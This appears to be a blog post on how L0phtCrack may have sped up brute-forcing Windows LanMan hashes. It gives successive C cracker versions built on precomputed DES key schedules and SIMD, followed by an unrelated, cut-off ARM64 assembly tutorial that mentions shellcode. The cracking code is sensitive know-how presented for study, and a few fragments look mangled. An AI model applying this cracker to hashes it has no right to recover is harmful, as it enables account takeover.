## How the L0pht (probably) optimized attack against the LanMan hash.

### 1. Introduction

Some of you may remember a famous group of hackers that operated out of a loft (or attic) in Boston, Massachusetts, USA between 1992 and 2000 that called themselves L0pht Heavy Industries. Perhaps a defining moment in the group’s history was in May 1998 when they testified before the United States Congress, forewarning about the fragility of the Internet and how it could be shut down in 30 minutes using the Border Gateway Protocol (BGP). Most oldskool hackers will remember them for being some of the first security researchers to practice responsible disclosure of software vulnerabilities via advisories, aswell as maintaining a number of websites like HackerNews.com, the Black Crawling Systems Archives, the Whacked Mac Archives and Guerilla.net.

Like many people, I remember the group for writing L0phtCrack, a tool designed to recover passwords protected by the Windows operating system. L0phtCrack was originally published with an advisory almost 22 years ago in April 1997. In the year 2000, a now defunct company called @atstake acquired L0pht, including the ownership rights to L0phtCrack. In 2004, Symantec acquired @atstake before discontinuing development and distribution of L0phtCrack in 2005. In 2009, members of the original L0pht group (Zatko, Wysopal, and Rioux) reacquired ownership rights to L0phtCrack and continued with its development up to the present day. Those of you that want to know more about the group can read History of the L0pht.

This post suggests some ways the L0pht may have accelerated recovery of passwords protected by the LanMan (LM) hash that is derived from the Data Encryption Standard (DES). I don’t reveal any Top Secret technique for cracking DES that only L0pht or some alphabet agencies know about. Similar optimizations were implemented over twenty years ago by Alexander Peslyak and Roman Rusakov in another popular password recovery tool called John The Ripper.

### 2. Data Encryption Standard

DES is a block cipher that operates on plaintext blocks of 64-bits and returns ciphertext blocks of the same size. Each key can be 56-bits in total giving us $2^{56}$ (72,057,594,037,927,936), or approximately 72 quadrillion possible keys. A 56-bit key is expanded into 16 subkeys or round keys, each of which is 48-bits long. It has for over 20 years been considered obsolete and insecure, but continues to be used mainly to support legacy systems.

What follows is a list of notable events around initial research into cracking DES, including the LanMan hash derived from DES.

 January 1997 Cryptographer Eli Biham publishes his paper at Fast Software Encryption 4 titled A Fast New DES Implementation in Software. It describes a novel way to optimize the Data Encryption Standard using simple bitwise operations (XOR, AND, NOT, OR). Although unrelated to the development of L0phtCrack, the technique would later be used to optimize attacks against the LanMan hash in tools like John The Ripper. January 1997 Rocke Verser launches DESCHALL in response to an offer by RSA to crack DES for a \$10,000 prize. March 1997 Samba developer Jeremy Allison releases pwdump. It enables Administrators to dump LM (derived from DES) and NTLM (derived from MD4) hashes stored in the Security Account Manager (SAM) database on Windows NT. April 1997 L0phtCrack v1.0 released. It primarily exploits the poor design of the LanMan algorithm to recover plaintext passwords. May 1997 Microsoft releases Service Pack 3 for Windows NT that includes “SYSKEY”; an optional component designed to prevent pwdump working properly. June 1997 Rocke Verser announces the recovery a 56-bit DES key. July 1997 L0phtCrack v1.5 released. Includes a much more detailed analysis of Server Message Block (SMB) authentications. Cryptographer David Wagner shares his observations on the the challenge response/pair and suggests ways to optimize attacks against it. August 1997 L0pht attend the Beyond HOPE (The Hackers on Planet Earth) conference in New York city. Discuss the lack of adequate security provided by vendors in various technologies. February 1998 L0phtCrack v2.0 released. Includes an SMB session network sniffer, a multithreaded brute force algorithm and faster search algorithm for large databases. May 1998 Matthew Kwan releases his “bitslice” code based on the paper by Eli Biham. July 1998 The Electronic Frontier Foundation build a DES cracker called “Deep Crack” and recover a 56-bit key in 56 hours using a device that costs \$250,000. January 1999 Deep Crack and distributed.net break a DES key in 22 hours and 15 minutes. January 1999 L0phtCrack v2.5 released. The DES routines have been highly optimized in assembler for Pentium, Pentium MMX, Pentium Pro, and Pentium II specific processors. This results in a 450% speed increase. All alphanumeric passwords can be found in under 24 hours on a Pentium II/450.

What I try to focus on in this post is how the L0pht gained a “450% speed increase” over previous versions of the software, but first, how are LanMan hashes created?

### 3. The LanMan Algorithm

1. The password is restricted to a maximum of fourteen characters. (null-padded if required)
2. The password is converted to uppercase.
3. The password is encoded in the system OEM code page.
4. The password is split into 7-byte halves and used to create two DES keys.
5. Each key is used to encrypt the string KGS!@#\$% using DES in ECB mode, resulting in two 8-byte ciphertext values. The string “KGS!@#\$% could possibly mean Key of Glen and Steve with the combination of Shift + 12345. Glen Zorn and Steve Cobb are the authors of RFC 2433 (Microsoft PPP CHAP Extensions).
6. The two ciphertext values are concatenated to create a 16-byte value, which is the LM hash.

Using the above details, the following code uses OpenSSL to generate a LanMan hash. The only thing missing is the OEM encoding. For that reason, hashes generated by this code will not always match those generated by Windows itself. Internally, Windows originally used the CharToOem API before creating a DES key. This is important to remember because some passwords generated by Windows will simply not be recovered unless the cracker uses CharToOem or CharToOemBuff before hand.

```#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#include <openssl/des.h>

void DES_str_to_key (char str[], uint8_t key[]) {
int i;

key[0] = str[0] >> 1;
key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
key[7] = str[6] & 0x7F;

for (i = 0;i < 8;i++) {
key[i] = (key[i] << 1);
}
DES_set_odd_parity ((DES_cblock*)key);
}

char* lmhash(char *pwd) {
DES_cblock       key1, key2;
DES_key_schedule ks1, ks2;
const char       ptext[]="KGS!@#\$%";
static char      hash[64], lm_pwd[16];
uint8_t          ctext[16];
size_t           i, pwd_len = strlen(pwd);

// 1. zero-initialize local buffer
memset(lm_pwd, 0, sizeof(lm_pwd));

// 2. convert password to uppercase (restricted to 14 characters)
for(i=0; i<pwd_len && i<14; i++) {
lm_pwd[i] = toupper((int)pwd[i]);
}

// 3. create two DES keys
DES_str_to_key(&lm_pwd[0], (uint8_t*)&key1);
DES_str_to_key(&lm_pwd[7], (uint8_t*)&key2);
DES_set_key(&key1, &ks1);
DES_set_key(&key2, &ks2);

// 4. encrypt plaintext
DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)&ctext[0], &ks1, DES_ENCRYPT);

DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)&ctext[8], &ks2, DES_ENCRYPT);

// 5. convert ciphertext to string
for(i=0; i<16; i++) {
snprintf(&hash[i*2], 3, "%02X", ctext[i]);
}
return hash;
}

int main(int argc, char *argv[]) {
if (argc!=2) {
return 0;
}

printf("LM Hash: %s\n", lmhash(argv[1]));
return 0;
}
```

We identify a number of weaknesses here based on the algorithm.

1. Electronic Code Book (ECB) mode using plaintext that is always the same. Contrast this with unix crypt3() that encrypts a nonce/salt resulting in unique ciphertext. As a result of the LanMan algorithm encrypting the same plaintext, passwords seven characters or less will always include 0xAAD3B435B51404EE in the 16-byte LM hash.
2. The fourteen character password is used to create two 7-byte or 56-bit DES keys. This means a brute force attack only requires $95^{7}$ attempts instead of $95^{14}$
3. Passwords are converted to uppercase, reducing the keyspace to $69^{7}$ attempts.

### 4. Brute Force Attack

Brute force has sometimes been referred to as “dumb mode” because rather than select passwords based on a predefined set of rules, it will simply attempt all possible combinations from a set of numbers and letters, including ones that are unlikely to be used in practice. Passwords should always be easy to recall, and even today it’s unusual for people to pick something that might be difficult to remember later. Having said that, rules are imperfect and sometimes only an exhaustive search of the keyspace will succeed.

The following screenshot is of L0phtcrack 2.5 running inside a virtual machine. As you can see, it averages around 5.64 million tries/keys per second.

The brute force cracker implemented in lmcrack is simply to demonstrate the overall gains achieved via simple optimizations and isn’t intended to be used for anything else. Those that want to recover passwords should use a fully functional password cracker.

### 5. Version 1

The first version is simply using the OpenSSL library. L0phtCrack v1.0 and v1.5 both used DES routines from the OpenSSL library.

```static bool crack_lm1(void *param) {
int              i;
DES_cblock       deskey;
DES_key_schedule ks;
uint8_t          pwd[8]={0};
const char       ptext[]="KGS!@#\$%";
uint8_t          ctext[8];
crack_opt_t      *c=(crack_opt_t*)param;

for(i=0;i<7;i++) {
if(c->pwd_idx[i] == ~0UL)break;
pwd[i] = c->alphabet[c->pwd_idx[i]];
}

// while not stopped
while(!c->stopped) {
// convert password to DES odd parity key
DES_str_to_key(pwd, deskey);
// create DES subkeys
DES_set_key(&deskey, &ks);
// encrypt plaintext
DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)ctext, &ks, DES_ENCRYPT);

// increase how many passwords processed
c->complete++;

// if hashes match, set found and exit loop
if(memcmp(ctext, c->hash.b, 8)==0) {
c->found=true;
return true;
}
// decrease total tried. if none left, exit
if(--c->total_cbn == 0) {
return false;
}
for(i=0;;i++) {
// increase one. if not length of alphabet, break.
if(++c->pwd_idx[i] != c->alpha_len) {
pwd[i] = c->alphabet[c->pwd_idx[i]];
break;
}
// reset index
c->pwd_idx[i]=0;
pwd[i] = c->alphabet[0];
}
}
// we didn't find it
return false;
}
```

The screenshot below shows 2.46 million keys per second are tested. It uses no optimization at all, apart from those used by the OpenSSL library.

### 6. Precomputing Key Schedules 1

The simple design of the DES key schedule algorithm makes both differential and linear attacks easier. That is not to imply the design was simplified to facilitate attacks. It was simplified to implement on 1970s hardware with wiring. The lack of non-linear operations means that no bits in a subkey overlap with another subkey. This allows us to use a bitwise OR / bitwise XOR to combine subkeys and generate completely new ones.

We can generate key schedules for each unique bit of a 56-bit key without requiring a large amount of storage. DES_init_keys() will perform this operation and only uses 229,376 bytes of RAM. That’s 256 key schedules (0x00-0xFF) for 7 bytes.

```void DES_str_to_key (char str[], uint8_t key[]) {
int i;

key[0] = str[0] >> 1;
key[1] = ((str[0] & 0x01) << 6) | (str[1] >> 2);
key[2] = ((str[1] & 0x03) << 5) | (str[2] >> 3);
key[3] = ((str[2] & 0x07) << 4) | (str[3] >> 4);
key[4] = ((str[3] & 0x0F) << 3) | (str[4] >> 5);
key[5] = ((str[4] & 0x1F) << 2) | (str[5] >> 6);
key[6] = ((str[5] & 0x3F) << 1) | (str[6] >> 7);
key[7] = str[6] & 0x7F;

for (i = 0;i < 8;i++) {
key[i] = (key[i] << 1);
}
DES_set_odd_parity ((DES_cblock*)key);
}

// initialize 7*256 key schedules
void DES_init_keys(DES_key_schedule ks_tbl[7][256]) {
DES_cblock key;
int        i, j;
char       pwd[8];

memset(pwd,0,sizeof(pwd));

// for each byte of a 56-bit key
for(i=0;i<7;i++) {
// create 256 key schedules
for(j=0;j<256;j++) {
pwd[i]=j;
DES_str_to_key(pwd, (uint8_t*)&key);
DES_set_key(&key, &ks_tbl[i][j]);
}
// clear byte
pwd[i]=0;
}
}
```

DES_set_keyx() works in the same way DES_set_key() does except it uses a precomputed table. As you will see later, this approach is much faster than using the function provided by OpenSSL. We are exploiting the lack of non-linear operations in the key scheduling algorithm and the fact no bits overlap with one another. A bitwise OR is used here, but an XOR will work too.

```/ generate DES key schedule from precomputed DES schedules
void DES_set_keyx(DES_cblock*key,
DES_key_schedule *ks, DES_key_schedule ks_tbl[7][256])
{
uint64_t *s, *d;
uint8_t  *k=(uint8_t*)key;
size_t   i, j;

d = (uint64_t*)ks;

// zero initialize
for(i=0; i<128/8; i++)
d[i]=0;

// for each byte of a 56-bit key
for(i=0; i<7; i++) {
// get a key schedule
s = (uint64_t*)&ks_tbl[i][k[i]];

// perform a bitwise OR
for(j=0; j<128/8; j++)
d[j] |= s[j];
}
}
```

### 7. Version 2

This is similar to version 1 with the obvious difference of using precomputed DES schedules.

```static bool crack_lm2(void *param) {
int              i;
DES_key_schedule ks;
uint8_t          pwd[7+1]={0};
const char       ptext[]="KGS!@#\$%";
uint8_t          ctext[8];
DES_key_schedule ks_tbl[7][256];
crack_opt_t      *c=(crack_opt_t*)param;

// precompute key schedules
DES_init_keys(ks_tbl);

for(i=0;i<7;i++) {
if(c->pwd_idx[i] == ~0UL)break;
pwd[i] = c->alphabet[c->pwd_idx[i]];
}

// while not stopped
while(!c->stopped) {
// create DES subkeys from index values
DES_set_keyx((DES_cblock*)pwd, &ks, ks_tbl);
// encrypt plaintext
DES_ecb_encrypt((const_DES_cblock*)ptext,
(DES_cblock*)ctext, &ks, DES_ENCRYPT);

// increase how many passwords processed
c->complete++;

// if hashes match, set found and exit loop
if(memcmp(ctext, c->hash.b, 8)==0) {
c->found=true;
return true;
}
// decrease total tried. if none left, exit
if(--c->total_cbn == 0) return false;
for(i=0;;i++) {
// increase one. if not length of alphabet, break.
if(++c->pwd_idx[i] != c->alpha_len) {
pwd[i] = c->alphabet[c->pwd_idx[i]];
break;
}
// reset index
c->pwd_idx[i]=0;
pwd[i] = c->alphabet[0];
}
}
// we didn't find it
return false;
}
```

4.44 million keys per second are tested which is a distinct improvement over version 1.

### 8. Using Macros For The Key Schedule Algorithm

In a brute force attack, we only require changing one byte in the password string for each iteration. However, DES_set_keyx will derive a key schedule from all 7 bytes. DES_init_keys2() is a new function that will generate DES key schedules using an alphabet and order them in a way that allows us to use macros for creating new key schedules.

```// initialize key schedules for alphabet
void DES_init_keys2(char alphabet[],
DES_key_schedule ks_tbl[7][256])
{
DES_cblock key;
char       pwd[7+1];
size_t     i, j, alpha_len=strlen(alphabet);

memset(pwd,0,sizeof(pwd));

// for each byte of a 56-bit key
for(i=0;i<7;i++) {
// create key schedules for each character of the alphabet
for(j=0;j<alpha_len;j++) {
pwd[i] = alphabet[j];
DES_str_to_key(pwd, (uint8_t*)&key);
DES_set_key(&key, &ks_tbl[i][j]);
}
// clear byte
pwd[i]=0;
}
}
```

The following macros replace DES_set_keyx and use vector instructions provded by SSE2 and AVX2 to improve performance.

```// create DES subkeys using precomputed schedules
// using AVX2 is slightly faster than SSE2, but not by much.
#if defined(AVX2)
#include <immintrin.h>

#define DES_SET_KEY(idx) { \
__m256i *s = (__m256i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
__m256i *p = (__m256i*)&ks[idx]; \
__m256i *d = (__m256i*)&ks[idx-1]; \
if (idx == 7) { \
d[0] = s[0]; d[1] = s[1]; \
d[2] = s[2]; d[3] = s[3]; \
} else { \
d[0] = _mm256_or_si256(s[0], p[0]); \
d[1] = _mm256_or_si256(s[1], p[1]); \
d[2] = _mm256_or_si256(s[2], p[2]); \
d[3] = _mm256_or_si256(s[3], p[3]); \
} \
}
#elif defined(SSE2)
#include <emmintrin.h>

#define DES_SET_KEY(idx) { \
__m128i *s = (__m128i*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
__m128i *p = (__m128i*)&ks[idx]; \
__m128i *d = (__m128i*)&ks[idx-1]; \
if (idx == 7) {\
d[0] = s[0]; d[1] = s[1]; \
d[2] = s[2]; d[3] = s[3]; \
d[4] = s[4]; d[5] = s[5]; \
d[6] = s[6]; d[7] = s[7]; \
} else { \
d[0] = _mm_or_si128(s[0], p[0]); \
d[1] = _mm_or_si128(s[1], p[1]); \
d[2] = _mm_or_si128(s[2], p[2]); \
d[3] = _mm_or_si128(s[3], p[3]); \
d[4] = _mm_or_si128(s[4], p[4]); \
d[5] = _mm_or_si128(s[5], p[5]); \
d[6] = _mm_or_si128(s[6], p[6]); \
d[7] = _mm_or_si128(s[7], p[7]); \
} \
}
#else
#define DES_SET_KEY(idx) { \
uint64_t *p = (uint64_t*)&ks[idx]; \
uint64_t *s = (uint64_t*)&ks_tbl[idx-1][c->pwd_idx[idx-1]]; \
uint64_t *d = (uint64_t*)&ks[idx-1]; \
\
d[ 0]=s[ 0]; d[ 1]=s[ 1]; d[ 2]=s[ 2]; d[ 3]=s[ 3]; \
d[ 4]=s[ 4]; d[ 5]=s[ 5]; d[ 6]=s[ 6]; d[ 7]=s[ 7]; \
d[ 8]=s[ 8]; d[ 9]=s[ 9]; d[10]=s[10]; d[11]=s[11]; \
d[12]=s[12]; d[13]=s[13]; d[14]=s[14]; d[15]=s[15]; \
\
if(idx < 7) { \
d[ 0] |= p[ 0]; d[ 1] |= p[ 1]; \
d[ 2] |= p[ 2]; d[ 3] |= p[ 3]; \
d[ 4] |= p[ 4]; d[ 5] |= p[ 5]; \
d[ 6] |= p[ 6]; d[ 7] |= p[ 7]; \
d[ 8] |= p[ 8]; d[ 9] |= p[ 9]; \
d[10] |= p[10]; d[11] |= p[11]; \
d[12] |= p[12]; d[13] |= p[13]; \
d[14] |= p[14]; d[15] |= p[15]; \
} \
}
#endif
```

This really speeds up an attack, but we’re not entirely finished yet.

### 9. Initial and Final Permutation

So far, we’ve focused primarily on the key scheduling algorithm, but now let’s examine the encryption algorithm and try to reduce the amount of code required for this process.

Before encryption, the 64-bit plaintext is remapped using something known as Initial Permutation (IP). After 16 rounds of encryption have been applied, the inverse known as Final Permutation (FP) is applied. Believe it or not, both IP and FP were made part of the DES specification simply because of how expensive it was to build hardware back in the 1970s. The designers identified an issue with the wiring of hardware after the project was completed and had the choice between building a new hardware device or changing the specification.

It was simply cheaper to change the specification and it’s widely accepted this additional process does not affect security of the cipher in any way. It is akin to a modern block cipher such as NOEKEON or SM4 that converts the plaintext to big-endian on little-endian machines. As you can see from the code below, it requires a lot of operations. By removing the permutation for both the plaintext and ciphertext, there is a significant increase in the speed of recovery.

```#define ROTATE(a,n)(((a)>>(n))+((a)<<(32-(n))))

#define PERM_OP(a,b,t,n,m) ((t)=((((a)>>(n))^(b))&(m)),\
(b)^=(t),\
(a)^=((t)<<(n)))

#define IP(l,r) \
{ \
register uint32_t tt; \
PERM_OP(r,l,tt, 4,0x0f0f0f0fL); \
PERM_OP(l,r,tt,16,0x0000ffffL); \
PERM_OP(r,l,tt, 2,0x33333333L); \
PERM_OP(l,r,tt, 8,0x00ff00ffL); \
PERM_OP(r,l,tt, 1,0x55555555L); \
}

// perform initial permutation on ciphertext/hash
h[0] = c->hash.w[0];
h[1] = c->hash.w[1];
IP(h[0], h[1]);
h[0] = ROTATE(h[0], 29) & 0xffffffffL;
h[1] = ROTATE(h[1], 29) & 0xffffffffL;
```

The plaintext KGS!@#\$% in its hexadecimal representation is 0x4B47532140232425. Once the initial permutation has been applied, we end up with 0xAA1907472400B807 that gets loaded into L and R before applying each round of encryption.

### 10. Skipping Rounds

We can safely skip the last round of encryption by first checking the result of L with half of the LM hash we are trying to crack. If they are equal, only then do we apply the last round and check R.

```                  // permuted plaintext
r = 0x2400B807; l = 0xAA190747;

k = (uint32_t*)&ks[0];

// encrypt
DES_F(l, r,  0); DES_F(r, l,  2);
DES_F(l, r,  4); DES_F(r, l,  6);
DES_F(l, r,  8); DES_F(r, l, 10);
DES_F(l, r, 12); DES_F(r, l, 14);
DES_F(l, r, 16); DES_F(r, l, 18);
DES_F(l, r, 20); DES_F(r, l, 22);
DES_F(l, r, 24); DES_F(r, l, 26);
DES_F(l, r, 28);

c->complete++;

// do we have one half of the LM hash?
if (h[0] == l) {
// apply the last round
DES_F(r, l, 30);
// do we have the full hash?
if (h[1] == r) {
// ok, we found the key
c->found = true;
return true;
}
}
```

### 11. Version 3

Note how the key schedule buffers are aligned by 32 bytes. This is to enable using AVX2.

```static bool crack_lm3(void *param) {
uint32_t         h[2], l, r, t, u, *k;
DES_key_schedule ks_tbl[7][256] __attribute__ ((aligned(32)));
DES_key_schedule ks[7]          __attribute__ ((aligned(32)));
crack_opt_t      *c=(crack_opt_t*)param;

// precompute key schedules for alphabet
DES_init_keys2(c->alphabet, ks_tbl);

// perform initial permutation on ciphertext/hash
h[0] = c->hash.w[0];
h[1] = c->hash.w[1];
IP(h[0], h[1]);
h[0] = ROTATE(h[0], 29) & 0xffffffffL;
h[1] = ROTATE(h[1], 29) & 0xffffffffL;

// set the initial key schedules based on pwd_idx
for (int i=7; i>0; i--) {
// if not set, skip it
if (c->pwd_idx[i-1] == ~0UL) continue;
// set key schedule for this index
DES_SET_KEY(i);
}

goto compute_lm;

do {
DES_SET_KEY(7);
do {
DES_SET_KEY(6);
do {
DES_SET_KEY(5);
do {
DES_SET_KEY(4);
do {
DES_SET_KEY(3);
do {
DES_SET_KEY(2);
do {
DES_SET_KEY(1);
compute_lm:
// permuted plaintext
r = 0x2400B807; l = 0xAA190747;

k = (uint32_t*)&ks[0];

// encrypt
DES_F(l, r,  0); DES_F(r, l,  2);
DES_F(l, r,  4); DES_F(r, l,  6);
DES_F(l, r,  8); DES_F(r, l, 10);
DES_F(l, r, 12); DES_F(r, l, 14);
DES_F(l, r, 16); DES_F(r, l, 18);
DES_F(l, r, 20); DES_F(r, l, 22);
DES_F(l, r, 24); DES_F(r, l, 26);
DES_F(l, r, 28);

c->complete++;

// do we have one half of the LM hash?
if (h[0] == l) {
// apply the last round
DES_F(r, l, 30);
// do we have the full hash?
if (h[1] == r) {
// ok, we found the key
c->found = true;
return true;
}
}

if (--c->total_cbn == 0) return false;
if (c->stopped) return false;

} while (++c->pwd_idx[0] < c->alpha_len);
c->pwd_idx[0] = 0;
} while (++c->pwd_idx[1] < c->alpha_len);
c->pwd_idx[1] = 0;
} while (++c->pwd_idx[2] < c->alpha_len);
c->pwd_idx[2] = 0;
} while (++c->pwd_idx[3] < c->alpha_len);
c->pwd_idx[3] = 0;
} while (++c->pwd_idx[4] < c->alpha_len);
c->pwd_idx[4] = 0;
} while (++c->pwd_idx[5] < c->alpha_len);
c->pwd_idx[5] = 0;
} while (++c->pwd_idx[6] < c->alpha_len);
return false;
}
```

Now we’re talking! Over 3.5 million keys per second more than version 2.

### 12. Precomputing Key Schedules 2

Our final optimization in C is the precomputation of key schedules for all 2-byte passwords and storing them in memory. For the alphabet A-Z, this requires 86,528 bytes of RAM. 69 characters would require 609,408 bytes of RAM. For devices that perform better with large blocks of memory, one might consider precomputing key schedules for all 3-byte passwords depending on the circumstances. Worst case scenario for 3-byte passwords is around 42MB. I’ve not tried using this amount, but it might be worth researching.

```    // create key schedules for every two character password
for(i=0;i<c->alpha_len;i++) {
memset(pwd, 0, sizeof(pwd));
pwd[0] = c->alphabet[i];

for(j=0;j<c->alpha_len;j++) {
pwd[1] = c->alphabet[j];
DES_str_to_key((char*)pwd, (uint8_t*)&key);
DES_set_key(&key, p);
p++;
}
}
```

The F round is also changed to factor in the 2-byte key schedules. k1 points to the key schedule for bytes 3-7 while k2 points to the key schedules for every 2-byte combination.

```#define LOAD_DATA_tmp(a,b,c,d,e,f) LOAD_DATA(a,b,c,d,e,f,g)
u=R^(k1[S  ] | k2[S  ]); \
t=R^(k1[S+1] | k2[S+1]);

#define DES_F(LL,R,S) {\
t=ROTATE(t,4); \
LL^=DES_sbox[0][(u>> 2L)&0x3f]^ \
DES_sbox[2][(u>>10L)&0x3f]^ \
DES_sbox[4][(u>>18L)&0x3f]^ \
DES_sbox[6][(u>>26L)&0x3f]^ \
DES_sbox[1][(t>> 2L)&0x3f]^ \
DES_sbox[3][(t>>10L)&0x3f]^ \
DES_sbox[5][(t>>18L)&0x3f]^ \
DES_sbox[7][(t>>26L)&0x3f]; }
```

### 13. Version 4

cbn contains the length of the alphabet squared. For $[A,Z]$, that’s $26^{2}$ or 676 combinations. By keeping the code inside the CPU cache longer, this helps improve performance.

```    k1 = (uint32_t*)&ks1[2];
k2 = (uint32_t*)&ks2[0];

k2 += ((c->pwd_idx[0] * c->alpha_len) + c->pwd_idx[1]) * 32;
cbn = c->alpha_len * c->alpha_len;

goto compute_lm;

do {
DES_SET_KEY(7);
do {
DES_SET_KEY(6);
do {
DES_SET_KEY(5);
do {
DES_SET_KEY(4);
do {
DES_SET_KEY(3);
k2 = (uint32_t*)&ks2[0];
compute_lm:
for(i=0;i<cbn;i++) {
// permuted plaintext
r = 0x2400B807; l = 0xAA190747;

// encrypt
DES_F(l, r,  0);
DES_F(r, l,  2); DES_F(l, r,  4);
DES_F(r, l,  6); DES_F(l, r,  8);
DES_F(r, l, 10); DES_F(l, r, 12);
DES_F(r, l, 14); DES_F(l, r, 16);
DES_F(r, l, 18); DES_F(l, r, 20);
DES_F(r, l, 22); DES_F(l, r, 24);
DES_F(r, l, 26); DES_F(l, r, 28);

if (h[0] == l) {
DES_F(r, l, 30);
if (h[1] == r) {
// yay, we found it.
c->pwd_idx[0] = (i / c->alpha_len);
c->pwd_idx[1] = (i % c->alpha_len);
c->found = true;
return true;
}
}
k2+=32;
}
c->complete += cbn;
c->total_cbn -= cbn;
if ((int64_t)c->total_cbn<0) return false;
if (c->stopped) return false;

} while (++c->pwd_idx[2] < c->alpha_len);
c->pwd_idx[2] = 0;
} while (++c->pwd_idx[3] < c->alpha_len);
c->pwd_idx[3] = 0;
} while (++c->pwd_idx[4] < c->alpha_len);
c->pwd_idx[4] = 0;
} while (++c->pwd_idx[5] < c->alpha_len);
c->pwd_idx[5] = 0;
} while (++c->pwd_idx[6] < c->alpha_len);
return false;
```

We see a modest increase in speed for a single thread, but this will make more of a difference in multithreaded mode. This time we have 8.64 million keys per second.

### 14. Results

Here are all four routines running one after the other using multiple threads.

We achieve a 300% speed increase, but that’s significantly less than the 450% gain advertised by L0phtCrack twenty years ago. The only explanation I can think of at this point is that optimizers for compilers 22 years ago were not as good as they are today. Well written assembler routines would increase the speed further, but not by that much IMHO. What I’ve shown here may not be exactly how the L0pht did it, but i’d say it’s probably close enough.

Source code

## Introduction

The Cortex-A76 codenamed “Enyo” will be the first of three CPU cores from ARM designed to target the laptop market between 2018-2020. ARM already has a monopoly on handheld devices, and are now projected to take a share of the laptop and server market. First, Apple announced in April 2018 its intention to replace Intel with ARM for their Macbook CPU from 2020 onwards. Second, a company called Ampere started shipping a 64-bit ARM CPU for servers in September 2018 that’s intended to compete with Intel’s XEON CPU. Moreover, the Automotive Enhanced (AE) version of the A76 unveiled in the same month will target applications like self-driving cars. The A76 will continue to support A32 and T32 instruction sets, but only for unprivileged code. Privileged code (kernel, drivers, hyper-visor) will only run in 64-bit mode. It’s clear that ARM intends to phase out support for 32-bit code with its A series. Developers of Linux distros have also decided to drop support for all 32-bit architectures, including ARM.

This post is an introduction to ARM64 assembly and will not cover any advanced topics. It will be updated periodically as I learn more, and if you have suggestions on how to improve the content, or you believe something needs correcting, feel free to email me.

If you just want the code shown in this post, look here.

Please refer to the ARM Architecture Reference Manual ARMv8, for ARMv8-A architecture profile for more comprehensive information about the ARMv8-A architecture. Everything I discuss with exception to the source code and GNU topics can be found in the manual.

## 1. ARM Architecture

ARM is a family of Reduced Instruction Set Computer (RISC) architectures for computer processors that has become the predominant CPU for smartphones, tablets, and most of the IoT devices being sold today. It is not just consumer electronics that use ARM. The CPU can be found in medical devices, cars, aeroplanes, robots..it can be found in billions of devices. The popularity of ARM is due in part to the reduced cost of production and power-efficiency. ARM Holdings Inc. is a fabless semiconductor company, which means they do not manufacture hardware. The company designs processor cores and license their technology as Intellectual Property (IP) to other semiconductor companies like ATMEL, NXP, and Samsung.

In this tutorial, I’ll be programming on “orca”, a Raspberry Pi (RPI) 3 running 64-bit Debian Linux. This RPI comes with a Cortex-A53, that can support privileged code in both 32 and 64-bit mode. The Cortex-A53 CPU is an ARMv8-A 64-bit core that has backward compatibility with ARMv7-A so that it can run the A32 and T32 instruction sets. Here’s a screenshot of output from `lscpu`.

There are currently two execution states you should be aware of.

AArch32
32-bit, with support for the T32 (Thumb) and A32 (ARM) instruction sets.
AArch64
64-bit, with support for the A64 instruction set.

This post only focuses on the A64 instruction set.

### 1.1 Profiles

There are three available, each one designed for a specific purpose. If you want to write shellcode, it’s safe to assume you’ll work primarily with the A series because it’s the only profile that supports a General Purpose Operating System (GPOS) such as Linux or Windows. A Real-Time Operating System (RTOS) is more likely to be found running on the R and M series.

Core Profile Application
A Application Supports a Virtual Memory System Architecture (VMSA) based on a Memory Management Unit (MMU).
Found in high performance devices that run an operating system such as Windows, Linux, Android or iOS.
R Real-time Found in medical devices, PLC, ECU, avionics, robotics. Where low latency and a high level of safety is required. For example, an electronic braking system in an automobile. Autonomous drones and Hunter Killers (HK).
M Microcontroller Supports a Protected Memory System Architecture (PMSA) based on a MMU. Found in ASICs, ASSPs, FPGAs, and SoCs for power management, I/O, touch screen, smart battery, and sensor controllers. Some drones use the M series. HK Aerial.

The vast majority of single-board computers run on the Cortex-A series because it has an MMU for translating virtual memory addresses to physical memory addresses required by most operating systems.

### 1.2 Operating Systems

An RTOS is time-critical whereas a GPOS isn’t. While I do not discuss writing code for an RTOS here, it’s important to know the difference because you’re not going to find Linux running on every ARM based device. Linux requires far too many resources to be suitable for a device with only 256KB of RAM. Certainly, Linux has a lot of support for peripheral devices, file-systems, dynamic loading of code, network connectivity, and user-interface support; all of this makes it ideal for internet connected handheld devices. However, you’re unlikely to find the same support in an RTOS because it is not a full OS in the sense that Linux is. An RTOS might only consist of a static library with support for task scheduling, Interprocess Communication (IPC), and synchronization.

Some RTOS such as QNX or VxWorks can be configured to support features normally found in a GPOS and it’s possible you will come across at least one of these in any vulnerability research. The following is a list of embedded operating systems you may wish to consider researching more about.

### 1.3 Registers

This post will only focus on using the general-purpose, zero and stack pointer registers, but not SIMD, floating point and vector registers. Most system calls only use general-purpose registers.

Name Size Description
Wn 32-bits General purpose registers 0-31
Xn 64-bits General purpose registers 0-31
WZR 32-bits Zero register
XZR 64-bits Zero register
SP 64-bits Stack pointer

W denotes 32-bit registers while X denotes 64-bit registers.

### 1.4 Calling convention

The following is applicable to Debian Linux. You may freely use x0-x18, but remember that if calling subroutines, they may use them as well.

Registers Description
X0 – X7 arguments and return value
X8 – X18 temporary registers
X19 – X28 callee-saved registers
X29 frame pointer
SP stack pointer

x0 – x7 are used to pass parameters and return values. The value of these registers may be freely modified by the called function (the callee) so the caller cannot assume anything about their content, even if they are not used in the parameter passing or for the returned value. This means that these registers are in practice caller-saved.

x8 – x18 are temporary registers for every function. No assumption can be made on their values upon returning from a function. In practice these registers are also caller-saved.

x19 – x28 are registers, that, if used by a function, must have their values preserved and later restored upon returning to the caller. These registers are known as callee-saved.

x29 can be used as a frame pointer and x30 is the link register. The callee should save x30 if it intends to call a subroutine.

### 1.5 Condition Flags

